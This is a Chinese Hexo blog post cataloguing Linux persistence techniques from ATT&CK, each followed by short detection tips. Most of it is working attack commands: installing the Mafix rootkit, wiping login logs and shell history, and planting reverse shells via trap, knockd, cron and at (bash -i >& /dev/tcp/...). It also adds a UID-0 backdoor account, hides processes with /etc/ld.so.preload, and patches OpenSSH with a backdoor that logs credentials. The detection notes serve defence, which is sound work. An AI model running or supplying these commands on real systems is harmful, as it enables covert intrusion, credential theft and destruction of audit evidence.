<!DOCTYPE html>
<html lang="zh-CN">





<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/apple-touch-icon.png">
  <link rel="icon" type="image/png" href="/img/avatar.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  <title>linux持久化及安全检测 - blog</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/5.12.1/css/all.min.css" />
<link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />
<link  rel="stylesheet" href="https://cdn.staticfile.org/mdbootstrap/4.13.0/css/mdb.min.css" />
<link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/3.0.1/github-markdown.min.css" />

<link rel="stylesheet" href="//at.alicdn.com/t/font_1067060_qzomjdt8bmp.css">



  <link  rel="stylesheet" href="/lib/prettify/tomorrow-night-eighties.min.css" />

<link  rel="stylesheet" href="/css/main.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />


<!-- 自定义样式保持在最底部 -->


<meta name="generator" content="Hexo 4.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>2nH' blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/">首页</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/archives/">归档</a>
          </li>
        
          
          
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/tags/">标签</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/about/">关于</a>
          </li>
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background" false
         style="background: url('https://s2.ax1x.com/2020/03/06/3qRsC6.jpg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask rgba-black-light flex-center">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              
                <p class="mt-3 post-meta">
                  <i class="fas fa-calendar-alt" aria-hidden="true"></i>
                  星期六, 十二月 21日 2019, 10:00 上午
                </p>
              

              <p class="mt-1">
                
                  
                  <span class="post-meta">
                    <i class="far fa-chart-bar"></i>
                    4.2k 字
                  </span>
                

                
                  
                  <span class="post-meta">
                      <i class="far fa-clock"></i>
                      17 分钟
                  </span>
                

                
                  <!-- 不蒜子统计文章PV -->
                  
                  <span id="busuanzi_container_page_pv" class="post-meta" style="display: none">
                    <i class="far fa-eye" aria-hidden="true"></i>
                    <span id="busuanzi_value_page_pv"></span> 次
                  </span>
                
              </p>
            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="py-5 z-depth-3" id="board">
        <div class="post-content mx-auto" id="post">
          
          <div class="markdown-body">
            <h1 id="linux持久化及安全检测"><a href="#linux持久化及安全检测" class="headerlink" title="linux持久化及安全检测"></a>linux持久化及安全检测</h1><p>结合<a href="http://vulhub.org.cn/attack" target="_blank" rel="noopener">ATT&amp;CK</a>和网上一些资料做了些持久化总结，供学习和交流，如有不足处，欢迎斧正。<strong>勿用于非法途径，否则后果自负。</strong></p>
<h2 id="1-Rootkit"><a href="#1-Rootkit" class="headerlink" title="1.    Rootkit"></a>1.    Rootkit</h2><p>rootkit分为内核级和应用级两种。<br>内核级的rootkit很多，比如：Diamorphine<br>应用级的rootkit也很多，比如：Mafix</p>
<h3 id="Mafix"><a href="#Mafix" class="headerlink" title="Mafix"></a>Mafix</h3><p>条件:root权限shell<br>Mafix是一款常用的轻量应用级别Rootkits，是通过伪造ssh协议漏洞实现远程登陆的特点是配置简单并可以自定义验证密码和端口号。应用级rookit，主要替换ls、ps、netstat命令来隐藏文件(利用/proc?)</p>
<h4 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h4><pre><code>wget http://forum.eviloctal.com/attachment.php?aid=13419
tar zvxf mafix.tar.gz
cd mafix
chmod +x root
./root password port</code></pre><p><img src="/img/%E6%8C%81%E4%B9%85%E5%8C%961.1.png" srcset="/img/loading.gif" alt="1.1"><br>安装完成，自动删除安装程序<br><img src="/img/%E6%8C%81%E4%B9%85%E5%8C%961.2.png" srcset="/img/loading.gif" alt="1.2"><br>netstat -an|grep 20000<br>检验安装情况</p>
<p>windows putty登录后门<br><img src="/img/%E6%8C%81%E4%B9%85%E5%8C%961.3.png" srcset="/img/loading.gif" alt="1.3"><br>登陆成功日志<br><img src="/img/%E6%8C%81%E4%B9%85%E5%8C%961.4.png" srcset="/img/loading.gif" alt="1.4"></p>
<h4 id="痕迹清理"><a href="#痕迹清理" class="headerlink" title="痕迹清理"></a>痕迹清理</h4><p>清理命令记录：<br>(1)仅清理当前用户： history -c<br>(2)使系统不再保存命令记录：vi /etc/profile，找到HISTSIZE这个值，修改为0<br>(3)删除记录<br>删除登录失败记录：echo&gt;/var/log/btmp<br>删除登录成功记录：echo&gt;/var/log/wtmp （此时执行last命令就会发现没有记录）删除日志记录：echo &gt; /var/log/secure  </p>
<h4 id="安全检测"><a href="#安全检测" class="headerlink" title="安全检测"></a>安全检测</h4><blockquote>
<p>Rkhunter</p>
</blockquote>
<p>Rkhunter的中文名叫“Rootkit猎手”, 目前可以发现大多数已知的rootkits和一些嗅探器以及后门程序. 它通过执行一系列的测试脚本来确认服务器是否已经感染rootkits. 比如检查rootkits使用的基本文件, 可执行二进制文件的错误文件权限, 检测内核模块等等。<br>rkhunter -c<br><img src="/img/%E6%8C%81%E4%B9%85%E5%8C%961.5.png" srcset="/img/loading.gif" alt="1.5"><br>ssh的远程root登陆开启了，默认是不允许直接root登陆的</p>
<blockquote>
<p>Chkrootkit  </p>
</blockquote>
<p>当然如果只是用Rkhunter检查扫描还是不够权威，再来安装一款检查下吧，chkrootkit 是一款小巧易用的Unix平台上的可以检测多种rootkit入侵的工具。它的功能包括检测文件修改、utmp/wtmp/last日志修改、界面欺骗(promiscuous interfaces)、恶意核心模块(maliciouskernel modules)。<br>直接运行可以对系统进行检测： /usr/local/chkrootkit/chkrootkit（./chkrootkit -n）<br><img src="/img/%E6%8C%81%E4%B9%85%E5%8C%961.6.png" srcset="/img/loading.gif" alt="1.6"><br>也可以./chkrootkit | grep INFECTED<br><img src="/img/%E6%8C%81%E4%B9%85%E5%8C%961.7.png" srcset="/img/loading.gif" alt="1.7"><br>出现INFECTED就说明系统可能有问题了</p>
<h2 id="2-Trap"><a href="#2-Trap" class="headerlink" title="2.    Trap"></a>2.    Trap</h2><p>trap 命令使程序和 shell 可以指定接收中断信号时执行的命令。 一种常见的情况是脚本允许正常终止和处理常见的键盘中断，如 ctrl+c 和 ctrl+d。当 shell 遇到特定的中断时，攻击者可以使用它来注册要执行的代码，以获得执行或作为持久性机制。 Trap 命令的格式如下：trap“命令列表”signals，当接收时到“signals”，将执行“命令列表”。 </p>
<h3 id="trap命令"><a href="#trap命令" class="headerlink" title="trap命令"></a>trap命令</h3><p>trap命令是专用于捕捉信号的。比如像Ctrl+C组合键会产生SIGINT信号，Ctrl+Z会产生SIGTSTP信号发送给终端等。在捕捉到信号之后，可以进行一系列的操作。<br><strong>用法</strong>：trap ‘command’ signals<br>比如：trap “echo ‘You pressed the ctrl+c ‘“ INT<br> 当按下ctrl+c，输出”You pressed the ctrl+c”<br>trap -l查看其他信号</p>
<h3 id="trap后门"><a href="#trap后门" class="headerlink" title="trap后门"></a>trap后门</h3><p>编写shell脚本：<br>test.sh</p>
<pre><code>#!/bin/bash  
# test trap command  
trap &quot;bash -i &gt;&amp; /dev/tcp/127.0.0.1/2333 0&gt;&amp;1&quot; SIGINT  //payload

echo This is a test script  

count=1  
while [ $count -le 10 ]  
do  
  echo &quot;hu $count&quot;  
  sleep 1  
  count=$[ $count + 1 ]  
done  

echo The end.  </code></pre><p>运行test脚本，当我们执行中断信号(ctrl+c)的时候，触发trap。<br><img src="/img/%E6%8C%81%E4%B9%85%E5%8C%962.1.png" srcset="/img/loading.gif" alt="2.1"><br>成功反弹shell。<br><img src="/img/%E6%8C%81%E4%B9%85%E5%8C%962.2.png" srcset="/img/loading.gif" alt="2.2"><br><strong>安全检测</strong><br>必须为 shell 或程序注册 trap 命令，因此它们出现在文件中。 监视文件是否存在可疑或过于宽泛的 trap 命令可以减少调查期间的可疑行为。 监视通过 trap 中断执行的可疑进程。<br>参考<br><a href="https://www.cnblogs.com/FengGeBlog/p/10407221.html" target="_blank" rel="noopener">https://www.cnblogs.com/FengGeBlog/p/10407221.html</a></p>
<h2 id="3-端口敲击"><a href="#3-端口敲击" class="headerlink" title="3.    端口敲击"></a>3.    端口敲击</h2><h3 id="什么是knock"><a href="#什么是knock" class="headerlink" title="什么是knock"></a>什么是knock</h3><p>端口敲击是一种较为成熟的技术，目的是隐藏开放的端口以控制访问，攻击者和防御者均可使用。 为了启用端口，攻击者需发送一系列具有特定特征的数据包。 通常，这些数据包包含关闭端口预定义的尝试序列，这可能涉及不常见的标志、特定的字符串或其他特征。 完成序列，通常由基于主机的防火墙开启端口，但也可以由自定义软件打开。 在动态开启监听端口和在不同系统上启动与监听服务器的连接时，都可以见到该技术。 可以通过不同的方法观察引发通信的数据包。 一种方法（最初由 Cd00r 实现）是使用 libpcap 库嗅探有问题的包。 另一种方法利用了原始套接字，这使得恶意软件可以使用供其他程序使用的开放端口。<br>Knocked工具安装<br>环境：centos7<br>下载knocked <a href="http://www.zeroflux.org/projects/knock" target="_blank" rel="noopener">http://www.zeroflux.org/projects/knock</a></p>
<ol>
<li>wget <a href="http://404-1252074372.cosgz.myqcloud.com/knockd/knock-0.7-1.el7.src.rpm" target="_blank" rel="noopener">http://404-1252074372.cosgz.myqcloud.com/knockd/knock-0.7-1.el7.src.rpm</a></li>
<li>安装rpmbuild：yum install -y rpm-build</li>
<li>安装 libpcap-devel：yum install -y libpcap-devel</li>
<li>安装gcc：yum install -y gcc</li>
<li>编译knockd：rpmbuild –rebuild knock-0.7-1.el7.src.rpm </li>
<li>安装knockd：rpm -ivh /root/rpmbuild/RPMS/x86_64/knock-*<br>此时knocked安装成功。<br>最后</li>
<li>根据自己的需要进行配置：/etc/knockd.conf</li>
<li>启动knocked服务： /etc/init.d/knockd start<br>作为安全管理工具，knocked可以隐藏自己的端口，当管理员正确敲击端口”密码序列”，knocked打开预先设定好的端口，让管理员访问。<br>比如管理员想要用手中的设备进行ssh连接，knocked配置如下：<pre><code>[options]  
  LogFile = /var/log/knockd.log  //日志地址       
</code></pre></li>
</ol>
<p>[opencloseSSH]<br>        sequence = 1000,1001,1002<br>        seq_timeout   = 15<br>        tcpflags = syn<br>        start_command = iptables -I INPUT -s %IP% -p tcp –dport ssh -j ACCEPT<br>        cmd_timeout   = 10<br>        stop_command  = /sbin/iptables -D INPUT -s %IP% -p tcp –dport ssh -j ACCEPT  </p>
<pre><code>
当依次敲击1000，1001，1002三个端口后，服务器添加一条iptables规则iptables -I INPUT -s %IP% -p tcp --dport ssh -j ACCEPT，允许敲击正确的ip通过ssh端口访问服务器。

端口敲击序列  
![3.1](/img/持久化3.1.png)   
查看日志(/var/log/knockd.log)，判断是否敲击成功  
如果第一个暗号被接受了，会记录下来：  
xxx.xxx.xxx.xxx : opencloseSSH: Stage 1  
后依次接收第二第三个暗号，成功执行opencloseSSH  
![3.2](/img/持久化3.2.png)   
knocked日志  
遇到的坑：  
每次更改配置记得restart服务如果接收不到，可能是部分端口被禁止了，或者没开icmp（如果是vps上搭建，多半是这个原因，去改安全策略）
### Knock后门
利用knocked可以构建我们的后门
在knocked加入一个功能：</code></pre><p>[Bounce shell]<br>        sequence = 1000,1001,1002<br>        seq_timeout = 30<br>        tcpflags = syn<br>        tart_command = bash -i &gt;&amp; /dev/tcp/127.0.0.1/2333 0&gt;&amp;1  </p>
<p>```  </p>
<p>在我们的攻击机上开启监听：nc -lvp 2333<br>依次敲击1000 1001 1002，反弹shell<br> <img src="/img/%E6%8C%81%E4%B9%85%E5%8C%963.3.png" srcset="/img/loading.gif" alt="3.3">   </p>
<h3 id="安全检测-1"><a href="#安全检测-1" class="headerlink" title="安全检测"></a>安全检测</h3><p>记录查看发送到系统和从系统发出的网络数据包，查找不属于已建立的无关数据包。<br>参考<br><a href="https://cloud.tencent.com/developer/article/1005328" target="_blank" rel="noopener">https://cloud.tencent.com/developer/article/1005328</a><br><a href="http://vulhub.org.cn/attack/techniques/T1205.md" target="_blank" rel="noopener">http://vulhub.org.cn/attack/techniques/T1205.md</a></p>
<h2 id="4-新建账户"><a href="#4-新建账户" class="headerlink" title="4.    新建账户"></a>4.    新建账户</h2><p>具有足够访问级别的攻击者可以创建本地系统或域帐户。 这些帐户可用持久化，不需要在系统上部署持久远程访问工具。  </p>
<h3 id="useradd命令和两个文件"><a href="#useradd命令和两个文件" class="headerlink" title="useradd命令和两个文件"></a>useradd命令和两个文件</h3><p><strong>useradd</strong><br>条件：超级用户权限<br>格式：useradd [-d home] [-s shell] [-c comment] [-m [-k template]] [-f inactive] [-e expire ] [-p passwd] [-r] name<br>参数：<br>-c：加上备注文字，备注文字保存在passwd的备注栏中。<br>　　-d：指定用户登入时的主目录，替换系统默认值/home/&lt;用户名&gt;<br>　　-D：变更预设值。<br>　　-e：指定账号的失效日期，日期格式为MM/DD/YY，例如06/30/12。缺省表示永久有效。<br>　　-f：指定在密码过期后多少天即关闭该账号。如果为0账号立即被停用；如果为-1则账号一直可用。默认值为-1.<br>　　-g：指定用户所属的群组。值可以使组名也可以是GID。用户组必须已经存在的，期默认值为100，即users。<br>　　-G：指定用户所属的附加群组。<br>　　-m：自动建立用户的登入目录。<br>　　-M：不要自动建立用户的登入目录。<br>　　-n：取消建立以用户名称为名的群组。<br>　　-r：建立系统账号。<br>-s：指定用户登入后所使用的shell。默认值为/bin/bash。<br>例如：<br>建立一个新用户账户testuser1，并设置UID为544，主目录为/usr/testuser1，属于users组：<br>#useradd -u 544 -d /usr/testuser1  -g users -m  testuser1  </p>
<p><strong>/etc/passwd和/etc/shadow</strong><br>/etc/passwd：用户信息<br>文件各字段   用户名：密码：用户ID：组ID：身份描述：用户的家目录：用户登录后所使用的SHELL</p>
<p>/etc/shadow：用户密码信息<br>文件各字段  用户名：密码的MD5加密值：数字表示自系统使用以来口令被修改的天数：数字表示口令的最小修改间隔：数字表示口令更改的周期：数字表示口令失效的天数：数字表示口令失效以后帐号会被锁定多少天：用户帐号到期时间：保留字段尚未使用<br>新建账户<br>环境：<br>Centos 7(靶机)<br>Ubuntu 16(攻击机）<br>Useradd -o -u 0 backdoor # 添加账户“backdoor” UID为0（root权限）<br>echo “123456” | passwd –stdin backdoor      # 设置密码  </p>
<p>通过ssh远程登录backdoor账户</p>
<h3 id="安全检测-2"><a href="#安全检测-2" class="headerlink" title="安全检测"></a>安全检测</h3><p>收集建立账户的数据，定期检查自己的账户。</p>
<p>参考<br><a href="https://www.cnblogs.com/EdwinChan/p/8350879.html" target="_blank" rel="noopener">https://www.cnblogs.com/EdwinChan/p/8350879.html</a></p>
<h2 id="5-隐藏文件和目录"><a href="#5-隐藏文件和目录" class="headerlink" title="5.    隐藏文件和目录"></a>5.    隐藏文件和目录</h2><h3 id="隐藏文件和目录"><a href="#隐藏文件和目录" class="headerlink" title="隐藏文件和目录"></a>隐藏文件和目录</h3><p>Linux下创建文件和目录，在命名前加一个“.“代表隐藏。<br>touch .webshell.php 创建名字为 .webshell.php 的文件<br>mkdir …/ 创建名字为 … 的文件夹<br>ls命令无法查看，ls -a可查看隐藏文件及目录</p>
<h3 id="隐藏历史操作命令"><a href="#隐藏历史操作命令" class="headerlink" title="隐藏历史操作命令"></a>隐藏历史操作命令</h3><p>1.关闭当前记录<br>关闭 set +o history<br>开启 set -o history<br>Ps：命令前加空格，命令本身也不会被记录。<br>2.清除历史记录<br>查看历史记录：#history<br>历史记录保存的位置：#cat /root/.bash_history  </p>
<h3 id="端口隐藏"><a href="#端口隐藏" class="headerlink" title="端口隐藏"></a>端口隐藏</h3><p><strong>通过端口复用来隐藏端口</strong>  </p>
<h4 id="1-SSLH"><a href="#1-SSLH" class="headerlink" title="1.SSLH"></a>1.SSLH</h4><p>安装SSLH<br> sudo apt-get install sslh<br>配置SSLH<br> 编辑 SSLH 配置文件：<br> sudo vi /etc/default/sslh  </p>
<p> 找到下列行：Run=no  将其修改为：Run=yes<br> 修改以下行以允许 SSLH 在所有可用接口上侦听端口 443<br> DAEMON_OPTS=”–user sslh –listen 0.0.0.0:443 –ssh 127.0.0.1:22 –ssl 127.0.0.1:443 –pidfile /var/run/sslh/sslh.pid”<br><strong>安全检测</strong></p>
<p>ps -ef | grep sslh 查看端口</p>
<h4 id="2-iptables"><a href="#2-iptables" class="headerlink" title="2.iptables"></a>2.iptables</h4><p>端口复用链<br>iptables -t nat -N LETMEIN<br>端口复用规则<br>iptables -t nat  -A LETMEIN -p tcp -j REDIRECT –to-port 22<br>开启开关<br>iptables -A INPUT -p tcp -m string –string ‘threathuntercoming’ –algo bm -m recent –set –name letmein –rsource -j ACCEPT<br>关闭开关<br>iptables -A INPUT -p tcp -m string –string ‘threathunterleaving’ –algo bm -m recent –name letmein –remove -j ACCEPT<br>let’s do it<br>iptables -t nat -A PREROUTING -p tcp –dport 80 –syn -m recent –rcheck –seconds 3600 –name letmein –rsource -j LETMEIN  </p>
<p><strong>利用方式:</strong><br>开启复用<br>echo threathuntercoming | socat - tcp:192.168.28.128:80<br>ssh使用80端口进行登录<br>ssh -p 80 <a href="mailto:root@192.168.28.128">root@192.168.28.128</a><br>关闭复用<br>echo threathunterleaving | socat - tcp:192.168.28.128:80<br>具体参考：<br><a href="https://www.freebuf.com/articles/network/137683.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/network/137683.html</a></p>
<h3 id="隐藏进程"><a href="#隐藏进程" class="headerlink" title="隐藏进程"></a>隐藏进程</h3><p><strong>Libprocesshider</strong><br>利用 LD_PRELOAD 来实现系统函数的劫持<br>下载程序编译<br>git clone <a href="https://github.com/gianlucaborello/libprocesshider.git" target="_blank" rel="noopener">https://github.com/gianlucaborello/libprocesshider.git</a><br>cd libprocesshider/ &amp;&amp; make<br>移动文件到/usr/local/lib/目录下<br>cp libprocesshider.so /usr/local/lib/<br>把它加载到全局动态连接局<br>echo /usr/local/lib/libprocesshider.so &gt;&gt; /etc/ld.so.preload  </p>
<p>运行evil_script.py测试<br>./evil_script.py 127.0.0.1 2333<br>Top命令无法找到evil_script.py  </p>
<p><strong>安全检测</strong><br>unhide 是一个小巧的网络取证工具，能够发现那些借助rootkit，LKM及其它技术隐藏的进程和TCP / UDP端口。<br>安装<br>sudo yum install unhide<br>使用<br>unhide [options] test_list<br> <img src="/img/%E6%8C%81%E4%B9%85%E5%8C%965.1.png" srcset="/img/loading.gif" alt="5.1">   </p>
<h2 id="6-预加载型恶意动态链接库"><a href="#6-预加载型恶意动态链接库" class="headerlink" title="6.    预加载型恶意动态链接库"></a>6.    预加载型恶意动态链接库</h2><p>动态链接库预加载机制是系统提供给用户运行自定义动态链接库的一种方式，在可执行程序运行之前就会预先加载用户定义的动态链接库的一种技术，这种技术可以重写系统的库函数，这种技术可以用来重写系统中有漏洞的库函数，达到修复漏洞的目的，但也可以被用来劫持。<br> <img src="/img/%E6%8C%81%E4%B9%85%E5%8C%966.1.png" srcset="/img/loading.gif" alt="6.1">    </p>
<p>LD_PRELOAD （用于预加载的环境变量）<br>LD_PRELOAD环境变量是会及时生效的<br>LD_PRELOAD=/lib/evil.so #LD_PRELOAD的值设置为要预加载的动态链接库<br>export LD_PRELOAD        #导出环境变量使该环境变量生效<br>unset LD_PRELOAD         #解除设置的LD_PRELOAD环境变量<br>常用工具：cub3 <a href="https://github.com/mempodippy/cub3" target="_blank" rel="noopener">https://github.com/mempodippy/cub3</a><br>/etc/ld.so.preload （用于预加载的配置文件）<br>将恶意so文件写入/etc/ld.so.preload就行:<br>echo “/lib/evil.so” &gt; /etc/ld.so.preload<br>常用工具：Vlany  <a href="https://github.com/mempodippy/vlany" target="_blank" rel="noopener">https://github.com/mempodippy/vlany</a>  </p>
<h3 id="安全检测-3"><a href="#安全检测-3" class="headerlink" title="安全检测"></a>安全检测</h3><p>通过strace命令去跟踪预加载的文件是否为/etc/ld.so.preload，以及文件中是否有异常的动态链接库,文件完整性校验。以及检查是否设置LD_PRELOAD环境变量(echo $LD_PRELOAD)等。</p>
<h2 id="7-本地作业调度"><a href="#7-本地作业调度" class="headerlink" title="7.    本地作业调度"></a>7.    本地作业调度</h2><p>本地作业调度就是常说的计划任务</p>
<h3 id="cron"><a href="#cron" class="headerlink" title="cron"></a>cron</h3><p>通过修改/etc/crontab，/etc/cron.d/目录或 Cron 守护进程支持的其他位置可以安装系统级的 cron 作业。而每个用户的 Cron 作业是通过 crontab 使用具有特定格式的 crontab 文件安装的。­它在 macOS 和 Linux 系统上都有效。<br>这些方法允许在没有用户交互的情况下在后台以特定的周期间隔执行命令或脚本。攻击者可以利用作业调度在系统启动时执行程序或为了持久性而在预定的基础上执行程序， 作为横向移动的一部分执行，获取 root 权限，或者在特定帐户的上下文中运行进程。  </p>
<p>靶机上设定计划任务：<br>(crontab -l;echo ‘*/1 * * * * exec 9&lt;&gt; /dev/tcp/127.0.0.1/2333;exec 0&lt;&9;exec 1&gt;&amp;9 2&gt;&1;/bin/bash –noprofile -i’)|crontab -  </p>
<p>1分钟后攻击机上成功监听：  </p>
<h3 id="at"><a href="#at" class="headerlink" title="at"></a>at</h3><p>at 程序是另一种方式，基于 POSIX 的系统（包括 macOS 和 Linux)。用于将程序或脚本作业安排在之后的日期和/或时间执行的一次性任务(cron多次)。<br>[root@localhost ~]# date             # 查看当前时间<br>[root@localhost ~]# at 00:27        # 创建at计划任务  +  时间<br>at&gt; bash -i &gt;&amp; /dev/tcp/127.0.0.1/2333 0&gt;&amp;1                    # 在08：26  bash命令反弹shell<br>at&gt; &lt;EOT&gt;                            # Ctrl+D  结束    </p>
<p>8：26攻击机上成功监听</p>
<h3 id="安全检测-4"><a href="#安全检测-4" class="headerlink" title="安全检测"></a>安全检测</h3><p>一般通过crontab -l（at -l等）命令即可检测到定时任务后门。不同的linux发行版可能查看开机启动项的文件不大相同，Debian系linux系统一般是通过查看/etc/init.d目录有无最近修改和异常的开机启动项。而Redhat系的linux系统一般是查看/etc/rc.d/init.d或者/etc/systemd/system等目录。</p>
<h2 id="8-Openssh"><a href="#8-Openssh" class="headerlink" title="8.    Openssh"></a>8.    Openssh</h2><p>通过在openssh源码中插入恶意代码并进行重新编译来替换原有sshd文件。插入的恶意代码可以是将登录成功的用户密码发送到远程服务器或者记录到某个log文件中。在openssh目录中找到includes.h文件。<br>安装后门<br>环境：centos6.9<br>下载openssh-5.9p1.tar.gz<br>wget <a href="http://ftp.jaist.ac.jp/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz" target="_blank" rel="noopener">http://ftp.jaist.ac.jp/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz</a><br>下载后门文件<br>wget <a href="http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz" target="_blank" rel="noopener">http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz</a><br>解压  </p>
<blockquote>
<p>tar zxvf openssh-5.9p1.tar.gz<br>tar zxvf openssh-5.9p1.patch.tar.gz    </p>
</blockquote>
<p>复制patch后门文件到正常openssh里面  </p>
<blockquote>
<p>cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1<br>patch &lt; sshbd5.9p1.diff<br> <img src="/img/%E6%8C%81%E4%B9%85%E5%8C%968.1.png" srcset="/img/loading.gif" alt="8.1">     </p>
</blockquote>
<p>修改后门密码和文件记录 vim includes.h</p>
<blockquote>
<p>int secret_ok;<br>FILE <em>f;<br>#define ILOG “/tmp/ilog”  # 记录登录到本机的用户名和密码<br>#define OLOG “/tmp/olog”  # 记录本机登录到远程的用户名和密码<br>#define SECRETPW “test” # 远程连接密码<br>#endif /</em> INCLUDES_H */    </p>
</blockquote>
<p>编译安装  </p>
<blockquote>
<p>yum install -y openssl openssl-devel pam-devel zlib zlib-devel<br>./configure –prefix=/usr/ –sysconfdir=/etc/ssh/ –with-pam –with-kerberos5<br>make clean<br>make &amp;&amp; make install<br>service sshd start （centos7：systemctl restart sshd.service）  </p>
</blockquote>
<p>攻击机连接后门<br><img src="/img/%E6%8C%81%E4%B9%85%E5%8C%968.2.png" srcset="/img/loading.gif" alt="8.2">     </p>
<h3 id="安全检测-5"><a href="#安全检测-5" class="headerlink" title="安全检测"></a>安全检测</h3><p>1、查看Openssh版本<br>ssh -V<br>2、查看ssh配置文件和/usr/sbin/sshd的时间<br>stat /usr/sbin/sshd<br>时间和版本都是可以修改的，所以不靠谱<br>3、查看日志<br>more /var/log/secure | grep “Accepted” | awk ‘{print $11}’ | uniq<br>4、通过strace监控sshd进程读写文件的操作<br>ps axu | grep sshd | grep -v grep #sshd父进程ID<br>strace -o sshd -ff -p 2908<br>grep open sshd* | grep -v -e No -e null -e denied| grep WR<br>5、一般的openssh后门都会将账户密码记录到文件或者发送到邮箱中<br>strings /usr/sbin/sshd |grep ‘[1-9]{1,3}.[1-9]{1,3}.’<br>strings /usr/sbin/sshd |grep ‘@’  </p>

            <hr>
          </div>
          <br>
          <div>
            <p>
            
              
              <span>
                <i class="iconfont icon-tag"></i>
                
                  <a class="hover-with-bg" href="/tags/%E5%86%85%E7%BD%91/">内网</a>
                
              </span>
            
            </p>
            
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container">
        <div id="toc">
  <p class="h5"><i class="far fa-list-alt"></i>&nbsp;目录</p>
  <div id="tocbot"></div>
</div>
      </div>
    
  </div>
</div>

<!-- custom -->


<!-- Comments -->
<div class="col-lg-7 mx-auto nopadding-md">
  <div class="container comments mx-auto" id="comments">
    
      <br><br>
      
      
  <script defer src="https://utteranc.es/client.js"
          repo="huuuz/huuuz.github.io"
          issue-term="pathname"
  
          label="utterances"
    
          theme="github-light"
          crossorigin="anonymous"
          async>
  </script>


    
  </div>
</div>

    
  </main>

  
    <a class="z-depth-1" id="scroll-top-button" href="#" role="button">
      <i class="fa fa-chevron-up scroll-top-arrow" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><b>Hexo</b></a>
    <i class="iconfont icon-love"></i>
    <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"> <b>Fluid</b></a>

    
  <div>
    
      <!-- 不蒜子统计PV -->
      
      <span id="busuanzi_container_site_pv" style="display: none">
      总访问量 <span id="busuanzi_value_site_pv"></span> 次
    </span>
    
    
      <!-- 不蒜子统计UV -->
      
      <span id="busuanzi_container_site_uv" style="display: none">
      总访客数 <span id="busuanzi_value_site_uv"></span> 人
    </span>
    
  </div>


    

    <!-- cnzz Analytics icon -->
    
  </div>
</footer>

<!-- SCRIPTS -->
<script  src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/popper.js/1.16.1/umd/popper.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js" ></script>
<script  src="https://cdn.staticfile.org/mdbootstrap/4.13.0/js/mdb.min.js" ></script>
<script  src="/js/main.js" ></script>


  <script  src="/js/lazyload.js" ></script>



  
  <script  src="https://cdn.staticfile.org/tocbot/4.10.0/tocbot.min.js" ></script>
  <script>
    $(document).ready(function () {
      var navHeight = $('#navbar').height();
      var toc = $('#toc');
      var main = $('main');
      var tocT = navHeight + (toc.offset().top - main.offset().top);
      var tocLimMin = main.offset().top - navHeight;
      var tocLimMax = $('#comments').offset().top - navHeight;
      $(window).scroll(function () {
        var scroH = document.body.scrollTop + document.documentElement.scrollTop;
        if (tocLimMin <= scroH && scroH <= tocLimMax) {
          toc.css({
            'display': 'block',
